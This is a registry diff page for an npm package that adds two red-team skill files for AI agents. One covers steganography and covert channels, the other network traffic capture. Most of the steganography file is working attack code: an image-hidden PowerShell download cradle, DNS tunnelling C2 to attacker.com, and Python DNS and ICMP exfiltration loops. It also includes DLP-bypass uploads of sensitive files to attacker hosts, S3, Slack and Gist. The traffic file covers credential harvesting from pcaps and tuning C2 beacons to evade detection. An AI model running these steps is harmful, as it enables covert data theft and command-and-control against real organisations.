npm - rtexit-method - Versions diffs - 0.1.4 → 0.1.6 - Mend

rtexit-method 0.1.4 → 0.1.6

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (17) hide show

package/packaged-assets/.agents/skills/rt-steganography/SKILL.md ADDED Viewed

@@ -0,0 +1,293 @@
+---
+name: rt-steganography
+description: "Steganography detection, extraction, and covert channel exploitation skill for authorized engagements. LSB steganography detection in images/audio, StegSolve analysis, outguess and steghide extraction, DNS tunneling for C2 and data exfiltration, ICMP covert channel, HTTP header hiding, and polyglot file creation. Use when testing data exfiltration controls, covert channel detection, or analyzing suspicious files."
+---
+# rt-steganography — Steganography & Covert Channels
+## Overview
+Steganography hides data inside legitimate files (images, audio, video, documents). Covert channels transmit data through unexpected protocol fields. In red team engagements these are used for: stealthy C2 communication, data exfiltration bypassing DLP, and hiding payloads inside innocent-looking files.
+---
+## Phase 1 — Steganography Detection
+```bash
+# Install tools
+apt install steghide outguess stegosuite binwalk exiftool -y
+pip3 install stegano
+# Check file for embedded data
+steghide info suspicious.jpg       # Check if steghide used
+steghide extract -sf suspicious.jpg -p ""  # Try empty password
+# Check metadata for hidden info
+exiftool suspicious.jpg            # EXIF data — can contain hidden text
+exiftool -all= clean.jpg           # Strip all metadata (for cleanup)
+# binwalk — find embedded files
+binwalk suspicious.jpg
+binwalk -e suspicious.jpg          # Extract embedded content
+# Look for: PK (zip), JFIF (jpeg), PNG header embedded in another file
+# Check for appended data after EOF
+xxd suspicious.jpg | tail -20
+# Normal JPEG ends with: FF D9
+# Data after FF D9 = hidden content
+# File size anomaly detection
+# Expected JPG at resolution X×Y should be ~N bytes
+# If much larger → hidden data likely
+identify -verbose suspicious.jpg | grep "File size"
+```
+### 1b — LSB Analysis with StegSolve
+```bash
+# StegSolve — visual steganography analyzer
+# java -jar stegsolve.jar
+# Manual LSB check (Python)
+python3 << 'EOF'
+from PIL import Image
+def extract_lsb(image_path, num_bits=1):
+    img = Image.open(image_path).convert("RGB")
+    pixels = list(img.getdata())
+    bits = ""
+    for pixel in pixels:
+        for channel in pixel:
+            bits += str(channel & 1)  # LSB of each channel
+    # Convert bits to text
+    chars = [bits[i:i+8] for i in range(0, len(bits), 8)]
+    text = ""
+    for c in chars:
+        try:
+            char = chr(int(c, 2))
+            if char.isprintable():
+                text += char
+            else:
+                break
+        except: break
+    return text[:500]  # First 500 printable chars
+result = extract_lsb("suspicious.jpg")
+print("LSB content:", result)
+EOF
+```
+### 1c — Statistical Detection
+```bash
+# StegoVeritas — comprehensive stego analysis
+pip3 install stegoveritas
+stegoveritas suspicious.jpg -out ./analysis/
+# Tests: LSB, metadata, appended data, color histograms, etc.
+# zsteg — detect in PNG/BMP
+gem install zsteg
+zsteg suspicious.png        # Try all common stego methods
+zsteg -a suspicious.png     # Try all channels
+# Audio steganography detection
+apt install mp3stego sox -y
+mp3stego -X suspicious.mp3  # Check MP3 for hidden data
+# Spectrum analysis (audio)
+python3 << 'EOF'
+import numpy as np
+import scipy.io.wavfile as wav
+import matplotlib.pyplot as plt
+rate, data = wav.read("suspicious.wav")
+freq = np.fft.fft(data[:rate])  # First second
+plt.specgram(data, Fs=rate, cmap='inferno')
+plt.savefig("spectrum.png")
+# Visual: hidden text/images sometimes visible in spectrogram
+EOF
+```
+---
+## Phase 2 — Embed Data (Red Team Exfiltration)
+```bash
+# Steghide — embed file in JPEG/BMP/WAV/AU
+steghide embed -cf cover.jpg -sf secret.txt -p "passphrase" -sf output.jpg
+# -cf = cover file, -sf = secret file, -p = password
+# Hide PowerShell payload in image
+echo "IEX(New-Object Net.WebClient).DownloadString('http://C2/shell.ps1')" > payload.txt
+steghide embed -cf photo.jpg -sf payload.txt -p "" -f  # No password, force
+# Extract on target
+steghide extract -sf photo.jpg -p ""
+# Outguess (harder to detect)
+outguess -k "secretkey" -d hidden.txt cover.jpg output.jpg
+outguess -k "secretkey" -r output.jpg recovered.txt
+# Hide in document metadata
+exiftool -Comment="BASE64_PAYLOAD" document.pdf
+exiftool -Artist="$(cat payload.txt | base64)" photo.jpg
+# Polyglot file (valid as two different formats)
+# JPEG + ZIP polyglot — opens as image AND contains ZIP
+cat cover.jpg payload.zip > polyglot.jpg
+# unzip polyglot.jpg → extracts ZIP contents
+# browser/image viewer → shows image
+```
+---
+## Phase 3 — DNS Tunneling (C2 / Exfiltration)
+```bash
+# DNS tunneling encodes data in DNS queries/responses
+# Bypasses most firewalls (DNS port 53 almost always allowed)
+# iodine — full IP tunnel over DNS
+# Server (needs a domain with NS record pointing to your server)
+iodined -f -c -P password 10.0.0.1 tunnel.attacker.com
+# Client (on compromised host)
+iodine -f -P password tunnel.attacker.com
+# Creates tun0 with 10.0.0.2 → full IP connectivity over DNS
+# dnscat2 — DNS C2 (simpler, no root needed)
+# Server
+ruby dnscat2.rb --dns "domain=tunnel.attacker.com,host=0.0.0.0" --secret=password
+# Client (on target)
+./dnscat --dns domain=tunnel.attacker.com --secret=password
+# Or PowerShell client:
+IEX (New-Object Net.WebClient).DownloadString('http://C2/Invoke-DNScat.ps1')
+Invoke-DNScat -Domain tunnel.attacker.com -Secret password
+# Manual DNS exfiltration (no tool needed — extreme environments)
+# Split secret into 63-char DNS label chunks
+python3 << 'EOF'
+import base64, subprocess
+secret = open("sensitive_data.txt", "rb").read()
+encoded = base64.b32encode(secret).decode().lower().rstrip("=")
+chunks = [encoded[i:i+60] for i in range(0, len(encoded), 60)]
+for i, chunk in enumerate(chunks):
+    # Each chunk = DNS query → logged by attacker's DNS server
+    subprocess.run(["nslookup", f"{i}.{chunk}.exfil.attacker.com"], capture_output=True)
+EOF
+```
+---
+## Phase 4 — ICMP Covert Channel
+```bash
+# ptunnel-ng — TCP over ICMP (bypasses TCP-blocking firewalls)
+# Server (attacker)
+ptunnel-ng -p ATTACKER_IP
+# Client (compromised host — only ICMP allowed out)
+ptunnel-ng -p ATTACKER_IP -lp 8022 -da INTERNAL_SSH_HOST -dp 22
+# Routes TCP port 8022 → ICMP → INTERNAL_SSH_HOST:22
+ssh -p 8022 user@localhost
+# Manual ICMP data hiding
+python3 << 'EOF'
+from scapy.all import *
+# Hide data in ICMP echo request payload
+secret = b"stolen_credential_hash_here"
+packet = IP(dst="8.8.8.8") / ICMP(type=8, code=0) / Raw(load=secret)
+send(packet)
+# Receive: monitor ICMP on attacker side
+sniff(filter="icmp and icmp[icmptype]=8",
+      prn=lambda p: print("RECV:", bytes(p[Raw])))
+EOF
+```
+---
+## Phase 5 — HTTP/HTTPS Covert Channels
+```bash
+# Hide data in HTTP headers (not logged by most proxies)
+curl https://target.com/ \
+  -H "X-Custom-Data: $(echo 'stolen data' | base64)" \
+  -H "X-Request-ID: $(cat /etc/passwd | head -1 | base64)"
+# HTTP timing channel (encode bits via request timing)
+python3 << 'EOF'
+import requests, time
+def send_bit(bit, url):
+    if bit == '1':
+        time.sleep(0.5)  # Delay = 1 bit
+    requests.get(url)    # Request = 0 bit
+secret = "SECRET"
+bits = ''.join(format(ord(c), '08b') for c in secret)
+for bit in bits:
+    send_bit(bit, "https://attacker.com/beacon")
+EOF
+# Exfil in User-Agent or other headers
+# (many DLP tools don't inspect all headers)
+curl "https://www.google.com" \
+  -H "User-Agent: Mozilla/5.0 $(cat sensitive.txt | base64 | tr -d '\n' | head -c 100)"
+```
+---
+## Phase 6 — DLP Bypass Techniques
+```bash
+# Bypass Data Loss Prevention controls
+# Encode data to avoid keyword detection
+cat sensitive.txt | base64 | curl -X POST https://attacker.com/ -d @-
+cat sensitive.txt | gzip | base64 | curl -X POST https://attacker.com/ -d @-
+# Embed in image (DLP can't scan steganography)
+steghide embed -cf innocent.jpg -sf sensitive.txt -p "key" && \
+  curl -X POST https://fileupload.attacker.com/ -F "file=@innocent.jpg"
+# Exfil via cloud storage (often whitelisted by DLP)
+aws s3 cp sensitive.txt s3://attacker-bucket/ --acl public-read
+# Or: Google Drive, Dropbox, OneDrive via API
+# Exfil over allowed SaaS APIs
+# Slack: post to attacker-controlled workspace
+curl -X POST https://slack.com/api/files.upload \
+  -H "Authorization: Bearer ATTACKER_TOKEN" \
+  -F file=@sensitive.txt -F channels=C0123456
+# GitHub Gist
+curl -X POST https://api.github.com/gists \
+  -H "Authorization: token ATTACKER_TOKEN" \
+  -d "{\"public\":false,\"files\":{\"data.txt\":{\"content\":\"$(base64 sensitive.txt)\"}}}"
+```
+---
+## Skill Levels
+**BEGINNER:** steghide/binwalk for detection · Basic LSB extraction · DNS exfiltration via nslookup
+**INTERMEDIATE:** iodine/dnscat2 C2 tunnel · ICMP covert channel · Embed payloads in images · DLP bypass via encoding
+**ADVANCED:** ptunnel-ng TCP-over-ICMP · Custom ICMP/HTTP covert channels · Statistical stego detection
+**EXPERT:** Custom DNS C2 protocol · Timing covert channels · Steganography in video streams · Anti-forensic exfiltration
+---
+## References
+- iodine: https://github.com/yarrick/iodine
+- dnscat2: https://github.com/iagox86/dnscat2
+- ptunnel-ng: https://github.com/utoni/ptunnel-ng
+- steghide: https://steghide.sourceforge.net
+- zsteg: https://github.com/zed-0xff/zsteg
+- MITRE T1048: https://attack.mitre.org/techniques/T1048/

package/packaged-assets/.agents/skills/rt-traffic-analysis/SKILL.md ADDED Viewed

@@ -0,0 +1,283 @@
+---
+name: rt-traffic-analysis
+description: "Network traffic capture and analysis skill for authorized engagements. Wireshark capture filters and display filters, tcpdump workflows, credential extraction from pcap files, protocol identification, C2 traffic analysis, TLS fingerprinting (JA3/JA3S), detecting lateral movement in packet captures, and automated pcap analysis with NetworkMiner and Zeek. Use when analyzing captured network traffic, verifying C2 traffic profile, or investigating network-level evidence."
+---
+# rt-traffic-analysis — Network Traffic Capture & Analysis
+## Overview
+Traffic analysis in red teaming serves two purposes: finding credentials and sensitive data in captured traffic, and verifying that your own C2 traffic blends in and avoids detection signatures.
+---
+## Phase 1 — Capture Setup
+```bash
+# tcpdump — command line capture
+# Capture all traffic on interface
+tcpdump -i eth0 -w capture.pcap
+# Capture specific host
+tcpdump -i eth0 host 10.10.10.50 -w target.pcap
+# Capture specific port range
+tcpdump -i eth0 'port 80 or port 443 or port 8080' -w web.pcap
+# Capture credentials (unencrypted protocols)
+tcpdump -i eth0 'port 21 or port 23 or port 110 or port 143 or port 25' -w cleartext.pcap
+# 21=FTP, 23=Telnet, 110=POP3, 143=IMAP, 25=SMTP
+# Capture from remote host (pipe over SSH)
+ssh user@PIVOT_HOST "tcpdump -i eth0 -w - 'not port 22'" | wireshark -k -i -
+# Promiscuous mode (capture all traffic on segment)
+tcpdump -i eth0 -p  # -p = don't use promiscuous (default on)
+ip link set eth0 promisc on  # Enable promiscuous
+```
+---
+## Phase 2 — Wireshark Filters
+```bash
+# Credential extraction filters
+# HTTP POST requests (login forms)
+http.request.method == "POST"
+# HTTP basic auth
+http.authorization
+# FTP credentials
+ftp.request.command == "PASS" or ftp.request.command == "USER"
+# Telnet (capture stream)
+telnet
+# SMTP auth
+smtp.auth
+# NTLM authentication (all protocols)
+ntlmssp
+# Kerberos
+kerberos
+# DNS queries (C2 detection / data exfiltration detection)
+dns
+# Long DNS queries (possible DNS tunneling)
+dns.qry.name.len > 50
+# SMB file access
+smb2.cmd == 5  # SMB2 Read
+# Key display filters
+ip.addr == 10.10.10.50                    # Traffic to/from specific host
+ip.src == 10.10.10.0/24                   # From subnet
+tcp.port == 4444                          # Specific port (C2 detection)
+frame.len > 1400                          # Large packets
+tcp.flags.syn == 1 && tcp.flags.ack == 0  # SYN scan detection
+http.response.code == 200                 # Successful HTTP responses
+ssl.handshake.type == 1                   # TLS Client Hello
+```
+---
+## Phase 3 — Automated Credential Extraction
+```bash
+# NetworkMiner — GUI tool, auto-extracts credentials from pcap
+# https://www.netresec.com/?page=NetworkMiner
+mono NetworkMiner.exe capture.pcap
+# Credentials tab → all extracted usernames/passwords
+# PCredz — automated credential extraction
+git clone https://github.com/lgandx/PCredz
+python3 PCredz.py -f capture.pcap
+# Extracts: HTTP Basic, FTP, Telnet, POP3, IMAP, SNMP community strings, NTLMv1/v2
+# Dsniff tools
+dsniff -p capture.pcap       # Extract passwords from pcap
+urlsnarf -p capture.pcap     # Extract URLs
+msgsnarf -p capture.pcap     # IM/chat messages
+mailsnarf -p capture.pcap    # Email contents
+# Extract HTTP credentials with tshark
+tshark -r capture.pcap -Y "http.request.method==POST" \
+  -T fields -e http.host -e http.request.uri -e urlencoded-form.value
+# Extract all HTTP request bodies
+tshark -r capture.pcap -Y "http" -T fields \
+  -e ip.src -e ip.dst -e http.request.method \
+  -e http.request.uri -e http.file_data
+# NTLM hash extraction
+tshark -r capture.pcap -Y "ntlmssp.auth" -T fields \
+  -e ntlmssp.auth.username -e ntlmssp.auth.domain \
+  -e ntlmssp.ntlmserverchallenge -e ntlmssp.auth.ntresponse
+```
+---
+## Phase 4 — TLS Fingerprinting (JA3/JA3S)
+```bash
+# JA3 fingerprints identify TLS clients (browsers, malware, tools)
+# JA3S fingerprints identify TLS servers
+# Use to: verify your C2 traffic, detect blue team tools, identify malware
+# Install ja3
+pip3 install pyja3
+python3 << 'EOF'
+import pyshark
+cap = pyshark.FileCapture('capture.pcap', display_filter='ssl.handshake.type==1')
+for pkt in cap:
+    try:
+        ja3 = pkt.ssl.handshake_type
+        print(f"Src: {pkt.ip.src} → JA3: {pkt.ssl.ja3}")
+    except: pass
+EOF
+# Compare against known JA3 databases
+# https://ja3er.com/
+# Cobalt Strike default JA3: 72a7c4f3d7c7cdbf3f8b1c1e9dbf3c1f (well-known, blocked)
+# → Use malleable profile to change JA3
+# tshark JA3 extraction
+tshark -r capture.pcap -Y "tls.handshake.type==1" \
+  -T fields -e ip.src -e tls.handshake.ja3
+```
+---
+## Phase 5 — C2 Traffic Verification
+```bash
+# Before engagement: verify your own C2 traffic blends in
+# Capture your beacon traffic → analyze for detection signatures
+# Check beacon interval regularity (beacons are too regular = detectable)
+python3 << 'EOF'
+from scapy.all import rdpcap, IP
+import statistics
+pkts = rdpcap("c2_traffic.pcap")
+times = [p.time for p in pkts if IP in p and p[IP].dst == "C2_IP"]
+intervals = [times[i+1]-times[i] for i in range(len(times)-1)]
+print(f"Mean interval: {statistics.mean(intervals):.2f}s")
+print(f"Std deviation: {statistics.stdev(intervals):.2f}s")
+# Low stdev = too regular → increase jitter in C2 profile
+EOF
+# Check packet sizes (uniform sizes = suspicious)
+tshark -r c2_traffic.pcap -T fields -e frame.len | sort | uniq -c | sort -rn | head -10
+# All same size = suspicious → add padding in malleable profile
+# Check DNS query frequency
+tshark -r c2_traffic.pcap -Y dns -T fields -e dns.qry.name | \
+  awk '{print $1}' | sort | uniq -c | sort -rn | head -20
+# Unusual subdomains or high frequency = DNS C2 signature
+```
+---
+## Phase 6 — Zeek (Bro) Analysis
+```bash
+# Zeek generates structured logs from pcap — easier to query than raw pcap
+apt install zeek -y
+# Analyze pcap
+zeek -r capture.pcap
+ls *.log
+# conn.log = all connections
+# http.log = HTTP requests
+# dns.log = DNS queries
+# ssl.log = TLS connections
+# files.log = transferred files
+# weird.log = protocol anomalies
+# Find C2 beacons (regular connections)
+cat conn.log | zeek-cut id.orig_h id.resp_h id.resp_p duration | \
+  awk '$4 < 1' | sort | uniq -c | sort -rn | head -20
+# Regular short connections to same host = beacon pattern
+# DNS tunneling detection
+cat dns.log | zeek-cut query | awk '{print length($1), $1}' | \
+  sort -rn | head -20 | awk '$1 > 50'
+# Long DNS queries = tunneling
+# Data exfiltration detection
+cat conn.log | zeek-cut id.orig_h id.resp_h orig_bytes | \
+  sort -k3 -rn | head -10
+# Large outbound transfers
+# HTTP user-agent analysis
+cat http.log | zeek-cut user_agent | sort | uniq -c | sort -rn
+# Unusual user agents = custom tools
+```
+---
+## Phase 7 — Protocol Identification
+```bash
+# Identify unknown protocols in captures
+# Wireshark: Analyze → Decode As → try different protocols
+# tshark protocol summary
+tshark -r capture.pcap -q -z io,phs
+# Shows protocol hierarchy
+# Find non-standard ports with known protocols
+tshark -r capture.pcap -q -z conv,tcp | head -20
+# Port 4444, 8888 etc = likely C2
+# ngrep — grep through packet payloads
+ngrep -q -I capture.pcap "password|secret|token" tcp
+# strings on pcap
+strings capture.pcap | grep -iE "password|api_key|secret|token|Authorization"
+# Identify binary protocols by magic bytes
+python3 << 'EOF'
+from scapy.all import rdpcap, Raw
+pkts = rdpcap("capture.pcap")
+for pkt in pkts:
+    if Raw in pkt:
+        payload = bytes(pkt[Raw])
+        if payload[:2] == b'\x4d\x5a':
+            print("PE executable in traffic!")
+        elif payload[:4] == b'\x50\x4b\x03\x04':
+            print("ZIP file in traffic!")
+        elif b'JFIF' in payload[:20] or b'\xff\xd8\xff' == payload[:3]:
+            print("JPEG in traffic!")
+EOF
+```
+---
+## Skill Levels
+**BEGINNER:** tcpdump capture + Wireshark display filters for credentials · PCredz automated extraction
+**INTERMEDIATE:** JA3 fingerprinting + C2 traffic profiling · Zeek analysis + DNS tunneling detection
+**ADVANCED:** Custom Zeek scripts for behavioral analysis · Beacon interval analysis + jitter verification
+**EXPERT:** ML-based traffic classification · Custom protocol dissectors · Full traffic replay and modification
+---
+## References
+- Wireshark display filters: https://wiki.wireshark.org/DisplayFilters
+- PCredz: https://github.com/lgandx/PCredz
+- Zeek: https://zeek.org
+- JA3: https://github.com/salesforce/ja3
+- MITRE T1040: https://attack.mitre.org/techniques/T1040/